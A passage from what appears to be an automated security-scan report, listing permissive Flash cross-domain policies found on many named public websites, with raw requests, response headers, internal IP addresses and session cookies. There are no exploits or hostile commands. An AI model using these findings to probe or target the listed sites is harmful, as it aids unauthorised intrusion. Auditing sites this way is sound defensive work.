Content-Length: 217
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.shopstyle.com" />
</cros
...[SNIP]...

7.419. http://www.shutterfly.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.shutterfly.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.shutterfly.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:00 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"970-1280438871000"
Last-Modified: Thu, 29 Jul 2010 21:27:51 GMT
Content-Type: application/xml
Content-Length: 970
Set-Cookie: lb=WFEu3qVZ-app196; Path=/
Set-Cookie: BIGipServerAPP-B-LR=1332809900.20480.0000; path=/
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*.shutterfly.com" secure="false" to-ports="443" />
...[SNIP]...
<allow-access-from domain="*.staticsfly.com" secure="false" to-ports="443" />
...[SNIP]...
<allow-access-from domain="*.betawave.com" secure="false" to-ports="80,443" />
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...

7.420. http://www.simon.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.simon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.simon.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 May 2010 18:11:42 GMT
Accept-Ranges: bytes
ETag: "083f9ec8fdca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 02 Apr 2011 14:09:18 GMT
Connection: close
Content-Length: 346

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.stanfordshop.com"/>
<allow-access-from domain="stanfordshop.com"/>
<allow-access-from domain="*.cdn.cloudfiles.rackspacecloud.com"/>
...[SNIP]...

7.421. http://www.simplyhired.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.simplyhired.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.simplyhired.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 12:44:06 GMT
Content-Type: text/xml
Connection: close
Set-Cookie: gc=1; expires=Sun, 03-Apr-2011 12:44:06 GMT; path=/
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Length: 120

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.thespringbox.com" />
</cross-domain-policy>

7.422. http://www.sixflags.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sixflags.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sixflags.com

Response

HTTP/1.1 200 OK
Content-Length: 267
Content-Type: text/xml
Last-Modified: Thu, 05 Mar 2009 19:53:24 GMT
Accept-Ranges: bytes
ETag: "79c111bcc9dc91:6ff"
Server: Microsoft-IIS/6.0
X-Powered-By: web3
Date: Sat, 02 Apr 2011 14:10:24 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://www.sixflags.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.cygnus.com" />
<allow-access-from domain="*.accesso.com" />
<allow-access-from domain="*.ceiris.com" />
...[SNIP]...

7.423. http://www.sky.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sky.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Mar 2011 14:58:52 GMT
Content-Type: text/xml
ETag: "pvcb59ab292c695f24aa10ec344e582daf"
Expires: Sat, 02 Apr 2011 14:00:15 GMT
Cache-Control: private, max-age=60
X-PvInfo: [S10202.C10879.A67423.RA0.G10818.UBB627152].[OT/xml.OG/pages]
X-Cnection: Close
Date: Sat, 02 Apr 2011 13:59:15 GMT
Content-Length: 444
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.google.com" />
   <allow-access-from domain="*.google.co.uk" />
   <allow-access-from domain="*.sky.com" />
   <allow-access-from domain="*.bskyb.com" />
   <allow-access-from domain="*.doubleclick.com" />
   <allow-access-from domain="*.doubleclick.net" />
...[SNIP]...

7.424. http://www.skype.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.skype.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.skype.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:14 GMT
Server: Apache
Last-Modified: Thu, 14 Oct 2010 09:18:24 GMT
ETag: "1a2-4929031207800"
Accept-Ranges: bytes
Content-Length: 418
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml
Content-Language: en

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>    
<allow-access-from domain="*.skype.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skype.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skype.test" secure="false" />
...[SNIP]...

7.425. http://www.slate.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.slate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.slate.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=864000
Content-Length: 284
Content-Type: text/xml
Last-Modified: Fri, 21 May 2010 14:41:54 GMT
Accept-Ranges: bytes
ETag: "3c258fc1f3f8ca1:64"
Server: Microsoft-IIS/6.0
Date: Sat, 02 Apr 2011 13:30:57 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*.slate.com" />
   <allow-access-from domain="*.slatev.com" />
   <allow-access-from domain="*.wpni.com" />
   <allow-access-from domain="*.washingtonpost.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

7.426. http://www.slide.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.slide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.slide.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:09 GMT
Server: Apache/2.2
Last-Modified: Thu, 24 Mar 2011 21:19:25 GMT
Vary: Accept-Encoding
X-Host: wb0.la1
Content-Length: 845
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*.slide.com" he
...[SNIP]...
<allow-access-from domain="*.slide.com" />
   <allow-access-from domain="*.slideobjects.com" />
   <allow-access-from domain="*.superpokepets.com" />
   <allow-access-from domain="*.socialstar.com" />
   <allow-access-from domain="*.sppranch.com" />
...[SNIP]...

7.427. http://www.smarter.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smarter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.smarter.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:08 GMT
Server: Apache
Last-Modified: Tue, 11 May 2010 05:55:40 GMT
ETag: "76740-d6-4864b2cda0f00"
Accept-Ranges: bytes
Content-Length: 214
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.smarter.com" />
</cross-d
...[SNIP]...

7.428. http://www.smilebox.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smilebox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.smilebox.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:04 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 00:51:13 GMT
ETag: "455018d-e9-4940752486240"
Accept-Ranges: bytes
Content-Length: 233
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.smilebox.com" />
...[SNIP]...

7.429. http://www.smileycentral.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smileycentral.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.smileycentral.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:21 GMT
Server: Apache/1.3.27 (Unix) Resin/2.0.5
Pragma: no-cache
Cache-control: max-age=0, must-revalidate
Expires: Sat 02 Apr 1977 17:15:00 GMT
Last-Modified: Mon, 21 Aug 2006 19:26:26 GMT
ETag: "679080-e7-44ea08e2"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.smileycentral.com" />
...[SNIP]...

7.430. http://www.snapfish.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.snapfish.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.snapfish.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:31 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"7097-1301617465000"
Last-Modified: Fri, 01 Apr 2011 00:24:25 GMT
Content-Type: application/xml
Content-Length: 7097
Connection: close
Set-Cookie: BIGipServersf3-scw-pod2=1695232522.16415.0000; path=/

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>


<allow-access-from domain="*.clarkcolor.com" secure="false" />
<allow-http-request-headers-
...[SNIP]...
<allow-access-from domain="*.snapfish-epuzzle.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mysticcolorlab.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.at" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.be" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.ch" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.co.in" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.com.au" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.com.sg" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.co.nz" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.de" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.es" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.eu" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.fr" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.it" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.jp" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.lu" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.nl" secure="false" />
...[SNIP]...
<allow-access-from domain="*.snapfish.se" secure="false" />
...[SNIP]...
<allow-access-from domain="*.truprint.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.walgreens.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.walmart.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yorkphoto.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.akamai-trials.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.goosiecards.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="images1.sfus1.qa.snapfish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="images2.sfus1.qa.snapfish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.qa.snapfish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="http://www2.sfsg1.qa.snapfish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="http://www1.sfsg1.qa.snapfish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="http://garskin.asia" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.garskin.asia" secure="false"/>
...[SNIP]...
<allow-access-from domain="http://dgsc.photo2.walgreens.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="localhost" secure="false"/>
...[SNIP]...
<allow-access-from domain="127.0.0.1" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.locr.com" />
<allow-access-from domain="*.wissenswerft.net" />
<allow-access-from domain="50.16.223.152" secure="false"/>
...[SNIP]...
<allow-access-from domain="snapfish.fingerprintpress.com" />
<allow-access-from domain="snapfish-staging.fingerprintpress.com" />
<allow-access-from domain="apps.ezprints.com" />
<allow-access-from domain="http://snapfish.planetjill.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="http://snapfish-stage.planetjill.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kidlandia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="publisherapp.myprinting.de" secure="false"/>
...[SNIP]...

7.431. http://www.softonic.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softonic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.softonic.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:35 GMT
Server: Apache
Expires: Sat, 02 Apr 2011 15:10:36 GMT
Cache-Control: max-age=5401, public
Last-Modified: Sat, 02 Apr 2011 11:10:36 GMT
ETag: "ec2faefc0402e177782d953fded2df8a"
Set-Cookie: softonic_es-admin=deleted; expires=Fri, 02-Apr-2010 13:40:34 GMT; path=/; domain=softonic.com
Set-Cookie: blang=_; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com
Set-Cookie: country=US; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com
Set-Cookie: ucountry=NA; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com
Set-Cookie: sads_country=US; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com
Set-Cookie: entry=Direct; expires=Sun, 01-Apr-2012 13:40:35 GMT; path=/; domain=softonic.com
Set-Cookie: PHPSESSID=d2964ace008ef5e5db9091ee1d0d62e4; path=/; domain=softonic.com
Vary: Accept-Encoding,User-Agent
Content-Length: 963
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-p
...[SNIP]...
<allow-access-from domain="*.softonic.com/" to-ports="*" />
   <allow-access-from domain="*.onsoftware.com" to-ports="*" />
   <allow-access-from domain="screencast-us.softonic.com" to-ports="*" />
   <allow-access-from domain="screencast-eu.softonic.com" to-ports="*" />
   <allow-access-from domain="*.sftcdn.net" to-ports="*" />
...[SNIP]...

7.432. http://www.spanishdict.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.spanishdict.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.spanishdict.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:49 GMT
Server: Apache
Last-Modified: Mon, 03 Aug 2009 16:43:52 GMT
ETag: "16e-4703f79968200"
Accept-Ranges: bytes
Content-Length: 366
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:41:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.spanishdict.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sdsandbox.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sdswift.com" secure="false" />
...[SNIP]...

7.433. http://www.spellingcity.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.spellingcity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.spellingcity.com

Response

HTTP/1.1 200 OK
Server: nginx/0.9.5
Date: Sat, 02 Apr 2011 13:43:11 GMT
Content-Type: text/xml
Content-Length: 278
Last-Modified: Tue, 30 Nov 2010 17:56:31 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.spellingcity.com" />
<allow-access-from domain="*.vocabulary.co.il" />
...[SNIP]...

7.434. http://www.sportsauthority.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sportsauthority.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sportsauthority.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:08 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4dc032-35e-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 862
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 14:07:08 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="tsa.imageg.net" />
<allo
...[SNIP]...
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.174" />
<allow-access-from domain="172.21.1.174" />
<allow-access-from domain="206.16.220.174" />
<allow-access-from domain="63.240.110.174" />
<allow-access-from domain="pm.allurent.net" />
<allow-access-from domain="*.pm.allurent.net" />
<allow-access-from domain="*.shared.allurent.net" />
<allow-access-from domain="*.sportsauthority.allurent.net" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

7.435. http://www.star-telegram.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.star-telegram.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.star-telegram.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Mon, 22 Jun 2009 18:43:30 GMT
ETag: "4112e8-db-4a3fd0d2"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:05:56 GMT
Content-Length: 219
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.star-telegram.com" />
</cro
...[SNIP]...

7.436. http://www.startribune.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.startribune.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.startribune.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 02 Apr 2011 06:01:28 GMT
X-Server-Name: sj-c14-r8-u31-b5
Content-Type: text/html;charset=utf-8
Date: Sat, 02 Apr 2011 13:37:30 GMT
Content-Length: 907
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>

<allow-access-from domain="*.startribune.com" />
<allow-access-from domain="cms.clickability.com" />
<allow-access-from domain="ww2.startribune.com" />
<allow-access-from domain="webdev1.startribune.com" />
<allow-access-from domain="www.printthis.clickability.com" />
<allow-access-from domain="dev.www.startribune.com" />
<allow-access-from domain="stage.www.startribune.com" />
<allow-access-from domain="prepstest.startribune.com" />
<allow-access-from domain="preps.startribune.com" />
<allow-access-from domain="gamefacemn.startribune.com" />
<allow-access-from domain="elections.startribune.com" />
<allow-access-from domain="dev.beta.startribune.com" />
<allow-access-from domain="stage.beta.startribune.com" />
...[SNIP]...

7.437. http://www.stumbleupon.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:13:29 GMT
Content-Type: application/xml
Content-Length: 460
Date: Sat, 02 Apr 2011 12:38:09 GMT
X-Varnish: 818641328
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...

7.438. http://www.stylelist.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stylelist.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stylelist.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:40 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 318
Keep-Alive: timeout=5, max=999972
Connection: Keep-Alive
Content-Type: application/xml

